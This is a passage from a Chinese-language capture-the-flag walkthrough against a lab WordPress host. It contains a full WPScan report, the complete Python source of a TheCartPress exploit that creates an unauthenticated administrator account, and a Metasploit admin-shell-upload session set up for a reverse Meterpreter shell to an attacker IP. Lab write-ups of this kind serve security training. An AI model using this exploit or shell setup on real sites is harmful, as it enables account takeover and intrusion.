\\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/itzhak.perlman.hmv\/ [192.168.0.136]\n[+] Started: Thu Jul 11 03:58:38 2024\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.54 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/itzhak.perlman.hmv\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - 
https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/itzhak.perlman.hmv\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/itzhak.perlman.hmv\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/itzhak.perlman.hmv\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 6.0.2 identified (Insecure, released on 2022-08-30).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/itzhak.perlman.hmv\/?feed=rss2, &lt;generator&gt;https:\/\/wordpress.org\/?v=6.0.2&lt;\/generator&gt;\n |  - http:\/\/itzhak.perlman.hmv\/?feed=comments-rss2, &lt;generator&gt;https:\/\/wordpress.org\/?v=6.0.2&lt;\/generator&gt;\n |\n | [!] 30 vulnerabilities identified:\n |\n | [!] Title: WP &lt; 6.0.3 - Stored XSS via wp-mail.php\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/713bdc8b-ab7c-46d7-9847-305344a579c4\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/abf236fdaf94455e7bc6e30980cf70401003e283\n |\n | [!] 
Title: WP &lt; 6.0.3 - Open Redirect via wp_nonce_ays\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/926cd097-b36f-4d26-9c51-0dfab11c301b\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/506eee125953deb658307bb3005417cb83f32095\n |\n | [!] Title: WP &lt; 6.0.3 - Email Address Disclosure via wp-mail.php\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/c5675b59-4b1d-4f64-9876-068e05145431\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44\n |\n | [!] Title: WP &lt; 6.0.3 - Reflected XSS via SQLi in Media Library\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/cfd8b50d-16aa-4319-9c2d-b227365c2156\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/8836d4682264e8030067e07f2f953a0f66cb76cc\n |\n | [!] Title: WP &lt; 6.0.3 - CSRF in wp-trackback.php\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/b60a6557-ae78-465c-95bc-a78cf74a6dd0\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/a4f9ca17fae0b7d97ff807a3c234cf219810fae0\n |\n | [!] Title: WP &lt; 6.0.3 - Stored XSS via the Customizer\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/2787684c-aaef-4171-95b4-ee5048c74218\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef\n |\n | [!] 
Title: WP &lt; 6.0.3 - Stored XSS via Comment Editing\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/02d76d8e-9558-41a5-bdb6-3957dc31563b\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/89c8f7919460c31c0f259453b4ffb63fde9fa955\n |\n | [!] Title: WP &lt; 6.0.3 - Content from Multipart Emails Leaked\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3f707e05-25f0-4566-88ed-d8d0aff3a872\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/3765886b4903b319764490d4ad5905bc5c310ef8\n |\n | [!] Title: WP &lt; 6.0.3 - SQLi in WP_Date_Query\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1da03338-557f-4cb6-9a65-3379df4cce47\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/d815d2e8b2a7c2be6694b49276ba3eee5166c21f\n |\n | [!] Title: WP &lt; 6.0.3 - Stored XSS via RSS Widget\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/58d131f5-f376-4679-b604-2b888de71c5b\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/929cf3cb9580636f1ae3fe944b8faf8cca420492\n |\n | [!] Title: WP &lt; 6.0.3 - Data Exposure via REST Terms\/Tags Endpoint\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/b27a8711-a0c0-4996-bd6a-01734702913e\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/ebaac57a9ac0174485c65de3d32ea56de2330d8e\n |\n | [!] 
Title: WP &lt; 6.0.3 - Multiple Stored XSS via Gutenberg\n |     Fixed in: 6.0.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9\n |      - https:\/\/wordpress.org\/news\/2022\/10\/wordpress-6-0-3-security-release\/\n |      - https:\/\/github.com\/WordPress\/gutenberg\/pull\/45045\/files\n |\n | [!] Title: WP &lt;= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/c8814e6e-78b3-4f63-a1d3-6906a84c1f11\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-3590\n |      - https:\/\/blog.sonarsource.com\/wordpress-core-unauthenticated-blind-ssrf\/\n |\n | [!] Title: WP &lt; 6.2.1 - Directory Traversal via Translation Files\n |     Fixed in: 6.0.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/2999613a-b8c8-4ec0-9164-5dfe63adf6e6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-2745\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP &lt; 6.2.1 - Thumbnail Image Update via CSRF\n |     Fixed in: 6.0.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/a03d744a-9839-4167-a356-3e7da0f1d532\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP &lt; 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery\n |     Fixed in: 6.0.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3b574451-2852-4789-bc19-d5cc39948db5\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] 
Title: WP &lt; 6.2.2 - Shortcode Execution in User Generated Data\n |     Fixed in: 6.0.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/ef289d46-ea83-4fa5-b003-0352c690fd89\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-2-security-release\/\n |\n | [!] Title: WP &lt; 6.2.1 - Contributor+ Content Injection\n |     Fixed in: 6.0.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1527ebdb-18bc-4f9d-9c20-8d729a628670\n |      - https:\/\/wordpress.org\/news\/2023\/05\/wordpress-6-2-1-maintenance-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/cd130bb3-8d04-4375-a89a-883af131ed3a\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-38000\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/da1419cc-d821-42d6-b648-bdb3c70d91f2\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP &lt; 6.3.2 - Denial of Service via Cache Poisoning\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/6d80e09d-34d5-4fda-81cb-e703d0e56e4f\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] 
Title: WP &lt; 6.3.2 - Subscriber+ Arbitrary Shortcode Execution\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3615aea0-90aa-4f9a-9792-078a90af7f59\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP &lt; 6.3.2 - Contributor+ Comment Disclosure\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-39999\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WP &lt; 6.3.2 - Unauthenticated Post Author Email Disclosure\n |     Fixed in: 6.0.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/19380917-4c27-4095-abf1-eba6f913b441\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-5561\n |      - https:\/\/wpscan.com\/blog\/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2\/\n |      - https:\/\/wordpress.org\/news\/2023\/10\/wordpress-6-3-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress &lt; 6.4.3 - Deserialization of Untrusted Data\n |     Fixed in: 6.0.7\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/5e9804e5-bbd4-4836-a5f0-b4388cc39225\n |      - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] Title: WordPress &lt; 6.4.3 - Admin+ PHP File Upload\n |     Fixed in: 6.0.7\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\n |      - https:\/\/wordpress.org\/news\/2024\/01\/wordpress-6-4-3-maintenance-and-security-release\/\n |\n | [!] 
Title: WP &lt; 6.5.2 - Unauthenticated Stored XSS\n |     Fixed in: 6.0.8\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1a5c5df1-57ee-4190-a336-b0266962078f\n |      - https:\/\/wordpress.org\/news\/2024\/04\/wordpress-6-5-2-maintenance-and-security-release\/\n |\n | [!] Title: WordPress &lt; 6.5.5 - Contributor+ Stored XSS in HTML API\n |     Fixed in: 6.0.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/2c63f136-4c1f-4093-9a8c-5e51f19eae28\n |      - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress &lt; 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n |     Fixed in: 6.0.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n |      - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress &lt; 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n |     Fixed in: 6.0.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n |      - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/\n | Last Updated: 2024-04-02T00:00:00.000Z\n | Readme: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/readme.txt\n | [!] The version is out of date, the latest version is 2.2\n | Style URL: http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6\n | Style Name: Twenty Twenty-One\n | Style URI: https:\/\/wordpress.org\/themes\/twentytwentyone\/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. 
Wi...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.6 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/itzhak.perlman.hmv\/wp-content\/themes\/twentytwentyone\/style.css?ver=1.6, Match: &#039;Version: 1.6&#039;\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] thecartpress\n | Location: http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/\n | Latest Version: 1.5.3.6 (up to date)\n | Last Updated: 2017-01-12T19:25:00.000Z\n |\n | Found By: Urls In Homepage (Passive Detection)\n |\n | [!] 1 vulnerability identified:\n |\n | [!] Title: TheCartPress eCommerce Shopping Cart &lt;= 1.5.3.6 - Unauthenticated Arbitrary Admin Account Creation\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/9b403259-0c84-4566-becd-eb531c486c21\n |      - https:\/\/www.exploit-db.com\/exploits\/50378\/\n |\n | Version: 1.5.3.6 (80% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - http:\/\/itzhak.perlman.hmv\/wp-content\/plugins\/thecartpress\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 &lt;====================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 19\n\n[+] Finished: Thu Jul 11 03:58:46 2024\n[+] Requests Done: 177\n[+] Cached Requests: 5\n[+] Data Sent: 52.722 KB\n[+] Data Received: 523.41 KB\n[+] Memory used: 272.953 MB\n[+] Elapsed time: 00:00:08<\/code><\/pre>\n<p>\u5c1d\u8bd5\u641c\u7d22\u5229\u7528\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<blockquote>\n<p>\u7a81\u7136\u51fa\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n<\/blockquote>\n<p><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746964.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746964.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711154410519\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u662f\u540e\u53f0\u4e0d\u65ad\u521b\u5efa\u7ebf\u7a0b\u5bfc\u81f4\u7684\uff0c\u5c1d\u8bd5\u91cd\u542f\u5c31\u597d\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ searchsploit -m 50378               \n  Exploit: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n      URL: https:\/\/www.exploit-db.com\/exploits\/50378\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50378.py\n    Codes: N\/A\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/perlman\/50378.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py                                        \nTheCartPress &lt;= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -&gt; space_hen (www.github.com\/spacehen)\nUsage: python3 exploit.py [target url]\nEx: python3 exploit.py https:\/\/example.com\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ python3 50378.py http:\/\/itzhak.perlman.hmv\nTheCartPress &lt;= 1.5.3.6 - Unauthenticated Privilege Escalation\nAuthor -&gt; space_hen (www.github.com\/spacehen)\nInserting 
admin...\nSuccess!\nNow login at \/wp-admin\/<\/code><\/pre>\n<pre><code class=\"language-python\"># Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)\n# Google Dork: inurl:\/wp-content\/plugins\/thecartpress\/\n# Date: 04\/10\/2021\n# Exploit Author: spacehen\n# Vendor Homepage: https:\/\/wordpress.org\/plugin\/thecartpress\n# Version: &lt;= 1.5.3.6\n# Tested on: Ubuntu 20.04.1\n\nimport os.path\nfrom os import path\nimport json\nimport requests;\nimport sys\n\ndef print_banner():\n        print(&quot;TheCartPress &lt;= 1.5.3.6 - Unauthenticated Privilege Escalation&quot;)\n        print(&quot;Author -&gt; space_hen (www.github.com\/spacehen)&quot;)\n\ndef print_usage():\n        print(&quot;Usage: python3 exploit.py [target url]&quot;)\n        print(&quot;Ex: python3 exploit.py https:\/\/example.com&quot;)\n\ndef vuln_check(uri):\n        response = requests.get(uri)\n        raw = response.text\n        if (&quot;User name is required&quot; in raw):\n                return True;\n        else:\n                return False;\n\ndef main():\n\n        print_banner()\n        if(len(sys.argv) != 2):\n                print_usage();\n                sys.exit(1);\n\n        base = sys.argv[1]\n\n        ajax_action = &#039;tcp_register_and_login_ajax&#039;\n        admin = &#039;\/wp-admin\/admin-ajax.php&#039;;\n\n        uri = base + admin + &#039;?action=&#039; + ajax_action ;\n        check = vuln_check(uri);\n\n        if(check == False):\n                print(&quot;(*) Target not vulnerable!&quot;);\n                sys.exit(1)\n\n        data = {\n        &quot;tcp_new_user_name&quot; : &quot;admin_02&quot;,\n        &quot;tcp_new_user_pass&quot; : &quot;admin1234&quot;,\n        &quot;tcp_repeat_user_pass&quot; : &quot;admin1234&quot;,\n        &quot;tcp_new_user_email&quot; : &quot;test@test.com&quot;,\n        &quot;tcp_role&quot; : &quot;administrator&quot;\n        }\n        print(&quot;Inserting 
admin...&quot;);\n        response = requests.post(uri, data=data )\n        if (response.text == &quot;\\&quot;\\&quot;&quot;):\n                print(&quot;Success!&quot;)\n                print(&quot;Now login at \/wp-admin\/&quot;)\n        else:\n                print(response.text)\n\nmain();<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746965.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746965.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711155524508\" style=\"zoom: 25%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746966.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746966.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711155553018\" style=\"zoom:25%;\" \/><\/div><\/p>\n<p>\u627e\u4e00\u4e0b\u4e0a\u4f20\u7684\u6f0f\u6d1e\uff1a<a 
href=\"https:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\/\">https:\/\/wpscan.com\/vulnerability\/a8e12fbe-c70b-4078-9015-cf57a05bdd4a\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746967.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746967.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711160116799\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u4e3a\u5565\u5361\u987f\u81f3\u6781\uff0c\u4f7f\u7528msf\u5b8c\u6210\u8fd9\u4e2a\u64cd\u4f5c\uff1a<a href=\"https:\/\/www.hackingarticles.in\/wordpress-reverse-shell\/\">https:\/\/www.hackingarticles.in\/wordpress-reverse-shell\/<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ msfconsole -q                             \nmsf6 &gt; search wordpress admin shell upload\n\nMatching Modules\n================\n\n   #  Name                                       Disclosure Date  Rank       Check  Description\n   -  ----                                       ---------------  ----       -----  -----------\n   0  exploit\/unix\/webapp\/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload\n\nInteract with a module by name or index. 
For example info 0, use 0 or use exploit\/unix\/webapp\/wp_admin_shell_upload\n\nmsf6 &gt; use 0\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; show options\n\nModule options (exploit\/unix\/webapp\/wp_admin_shell_upload):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   PASSWORD                    yes       The WordPress password to authenticate with\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/                yes       The base path to the wordpress application\n   USERNAME                    yes       The WordPress username to authenticate with\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   WordPress\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; set username admin_02\nusername =&gt; admin_02\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; set password admin1234\npassword =&gt; admin1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; set rhosts itzhak.perlman.hmv\nrhosts =&gt; itzhak.perlman.hmv\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; set lhost 192.168.0.143\nlhost =&gt; 
192.168.0.143\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; set lport 1234\nlport =&gt; 1234\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) &gt; exploit\n\n[*] Started reverse TCP handler on 192.168.0.143:1234 \n[*] Authenticating with WordPress using admin_02:admin1234...\n[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n<p>\u4e0d\u884c\u3002\u3002\u3002\u3002\u770b\u4e86\u7fa4\u4e3b\u89c6\u9891\u4ee5\u540e\u53d1\u73b0\u5c06\u90e8\u5206\u8bf7\u6c42\u7ed9\u4ed6\u5c4f\u853d\u6389\uff0c\u7ed9\u4ed6block\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746968.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746968.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711162722615\" style=\"zoom:33%;\" 